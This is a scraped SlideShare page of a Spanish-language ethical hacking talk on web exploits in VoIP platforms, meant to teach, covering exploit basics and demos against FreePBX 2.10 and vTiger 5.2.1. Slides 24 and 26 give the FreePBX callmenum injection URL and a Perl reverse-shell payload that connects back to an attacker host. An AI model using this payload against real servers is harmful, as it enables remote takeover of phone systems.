Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Web Exploiting
and
Reversing Shell
In
VoIP Plataforms
$ Whois @jroliva
Juan Oliva
C|EH, CPTE, OSEH, BNS, dCAA, ECE, LPIC-1, Novell CLA
Proyectos de Ethical Hacking
Proyectos de...
DESCARGO DE RESPONSABILIDAD
Esta presentación tiene como propósito proveer
unicamente información. No aplicar este materia...
INTRODUCCION
INTRODUCCION

VULNERABILIDAD
FALLO O DEBILIDAD DE UN SISTEMA, PLATAFORMA O APLICACION
ATAQUE
COMPROMETER LA SEGURIDAD DEL ...
INTRODUCCION

VULNERABILIDADES ESPECIFICAS

- DESBORDAMIENTO DE BUFFER OVERFLOW
- DESBORDAMIENTO DE CARRERA (race conditio...
QUE ES UN EXPLOIT
QUE ES UN EXPLOIT

DEFINICIÓN

Un Exploit es un programa o código que "explota" una
vulnerabilidad del sistema de forma ma...
QUE ES UN EXPLOIT

DEFINICION

Si bien el código que explota la vulnerabilidad no es un código
malicioso en sí mismo, gene...
TIPOS DE EXPLOIT
TIPOS DE EXPLOIT

REMOTOS
Los que pueden ser lanzados desde una ubicación
Diferente de la red del equipo de la victima (in...
TIPOS DE EXPLOIT

LOCALES
Permiten elevar privilegios de un sistema operativo solo en la
Red local del equipo víctima
DONDE LOS ENCUENTRAN

Existen muchas páginas dónde se publican diferentes tipos
de exploits :

- exploit-db.com
- packetst...
COMO SE HACEN LOS EXPLOITS
COMO SE HACEN LOS EXPLOITS

HERRAMIENTAS DE DESARROLLO

Pueden ser escritos en diferentes lenguajes
Tradicionalmente se re...
COMO SE HACEN LOS EXPLOITS

HERRAMIENTAS DE DESARROLLO

Sin embargo con el desarrollo de los lenguajes y vulnerabilidades
...
EL CICLO DE VIDA
CICLO DE VIDA
CICLO DE VIDA
VIENDO APLICACIONES WEB
EXPLOTABLES EN PLATAFORMAS VOIP
APLICACIONES WEB
EXPLOTABLES EN PLATAFORMAS VOIP
FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
Vulnerabilidad es de tipo “Remote Code Execution Exploit” ,
es deci...
Pero como funciona ??
URL A LA CUAL INGRESA EL PROGRAMA:

/recordings/misc/callme_page.php?action=c&callmenum='
CODIGO QUE INYECTA

UN POCO FEO NO ???
CODIGO QUE INYECTA
str(extension) '@from-internal/n
Application: system
Data: perl -MIO -e '$p=fork;exit,if($p);
$c=new IO...
Bingo , tengo shell !!
AHORA VAMOS A LA PRACTICA
DEMO TIME !!
Exploit en Freepbx 2.10
APLICACIONES WEB
EXPLOTABLES EN PLATAFORMAS VOIP
PHP CODE INYECTION en VTIGER 5.2.1
Descripción : El fundamento básico de esta técnica, es inyectar
código arbitrario , com...
DEMO
Exploit en VTIGER 5.2.1
Gracias !!!
Juan Oliva
Consultor en Ethical Hacking y Voip
gtalk :jroliva@gmail.com
Twiter : @jroliva
Blog : http://jroliv...
Web exploits in VoIP Platforms
Web exploits in VoIP Platforms
Web exploits in VoIP Platforms
Web exploits in VoIP Platforms
Upcoming SlideShare
Loading in …5
×

Web exploits in VoIP Platforms

515 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Web exploits in VoIP Platforms

  1. 1. Web Exploiting and Reversing Shell In VoIP Plataforms
  2. 2. $ Whois @jroliva Juan Oliva C|EH, CPTE, OSEH, BNS, dCAA, ECE, LPIC-1, Novell CLA Proyectos de Ethical Hacking Proyectos de Voz sobre IP. Blog : jroliva.wordpress.com Instructor - Certificación Linux Professional Institute LPI-C1 - Certificación de Seguridad de Elastix “ESM” - Curso y taller Ethical Hacking y Voz sobre IP
  3. 3. DESCARGO DE RESPONSABILIDAD Esta presentación tiene como propósito proveer unicamente información. No aplicar este material ni conocimientos sin el Consentimiento explícito que autorice a hacerlo. Los lectores (participantes, oyentes, videntes) asumen la responsabilidad completa por la aplicación o experimentación de este material y/o conocimientos presentados. El(los) autor(es) quedan exceptuados de cualquier reclamo directo o indirecto respecto a daños que puedan haber sido causados por la aplicación de este material y/o conocimientos expuestos. La información aquí expuesta representa las opiniones y perspectivas propias del autor respecto a la materia y no representan ninguna posicion oficial de alguna organización asociada.
  4. 4. INTRODUCCION
  5. 5. INTRODUCCION VULNERABILIDAD FALLO O DEBILIDAD DE UN SISTEMA, PLATAFORMA O APLICACION ATAQUE COMPROMETER LA SEGURIDAD DEL SISTEMA APROBECANDONOS DE UNA VULNERABILIDAD CONTRAMEDIDA ACCIONES A LLEVAR A CABO PARA EVITAR TENER VULNERABILIDADES
  6. 6. INTRODUCCION VULNERABILIDADES ESPECIFICAS - DESBORDAMIENTO DE BUFFER OVERFLOW - DESBORDAMIENTO DE CARRERA (race condition) - FORMATO DE CADENA (format string error) - INYECCIONES SQL (SQL Inyection)
  7. 7. QUE ES UN EXPLOIT
  8. 8. QUE ES UN EXPLOIT DEFINICIÓN Un Exploit es un programa o código que "explota" una vulnerabilidad del sistema de forma manual o totalmente Automatizada
  9. 9. QUE ES UN EXPLOIT DEFINICION Si bien el código que explota la vulnerabilidad no es un código malicioso en sí mismo, generalmente se utiliza para otros fines - Acceso no autorizado a un sistema - Malware como gusanos y troyanos.
  10. 10. TIPOS DE EXPLOIT
  11. 11. TIPOS DE EXPLOIT REMOTOS Los que pueden ser lanzados desde una ubicación Diferente de la red del equipo de la victima (internet) Si se logra su ejecución es posible tomar el control del equipo Comprometido parcial o totalmente.
  12. 12. TIPOS DE EXPLOIT LOCALES Permiten elevar privilegios de un sistema operativo solo en la Red local del equipo víctima
  13. 13. DONDE LOS ENCUENTRAN Existen muchas páginas dónde se publican diferentes tipos de exploits : - exploit-db.com - packetstormsecurity.com - exploitsdownload.com - cvedetails.com
  14. 14. COMO SE HACEN LOS EXPLOITS
  15. 15. COMO SE HACEN LOS EXPLOITS HERRAMIENTAS DE DESARROLLO Pueden ser escritos en diferentes lenguajes Tradicionalmente se realizan en C , perl , bash , nc
  16. 16. COMO SE HACEN LOS EXPLOITS HERRAMIENTAS DE DESARROLLO Sin embargo con el desarrollo de los lenguajes y vulnerabilidades Hoy es posible desarrollar exploits con python o PHP inclusive
  17. 17. EL CICLO DE VIDA
  18. 18. CICLO DE VIDA
  19. 19. CICLO DE VIDA
  20. 20. VIENDO APLICACIONES WEB EXPLOTABLES EN PLATAFORMAS VOIP
  21. 21. APLICACIONES WEB EXPLOTABLES EN PLATAFORMAS VOIP
  22. 22. FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution Vulnerabilidad es de tipo “Remote Code Execution Exploit” , es decir inyecta código en una página no autentificada variables que generan la ejecución de sentencias del sistema operativo vía la función “system” de asterisk , Resultado : genera una conexión reversa desde el host atacado hacia el host del atacante vía el puerto 443.
  23. 23. Pero como funciona ??
  24. 24. URL A LA CUAL INGRESA EL PROGRAMA: /recordings/misc/callme_page.php?action=c&callmenum='
  25. 25. CODIGO QUE INYECTA UN POCO FEO NO ???
  26. 26. CODIGO QUE INYECTA str(extension) '@from-internal/n Application: system Data: perl -MIO -e '$p=fork;exit,if($p); $c=new IO::Socket::INET(PeerAddr,"' str(lhost) ':' str(lport) '"); STDIN->fdopen($c,r); $~->fdopen($c,w);system$_ while<>;' Ahora si la veo !!
  27. 27. Bingo , tengo shell !!
  28. 28. AHORA VAMOS A LA PRACTICA DEMO TIME !! Exploit en Freepbx 2.10
  29. 29. APLICACIONES WEB EXPLOTABLES EN PLATAFORMAS VOIP
  30. 30. PHP CODE INYECTION en VTIGER 5.2.1 Descripción : El fundamento básico de esta técnica, es inyectar código arbitrario , como lo hace una inyección SQL Resultado : Obtención de una Shell reversa.
  31. 31. DEMO Exploit en VTIGER 5.2.1
  32. 32. Gracias !!! Juan Oliva Consultor en Ethical Hacking y Voip gtalk :jroliva@gmail.com Twiter : @jroliva Blog : http://jroliva.wordpress.com/

×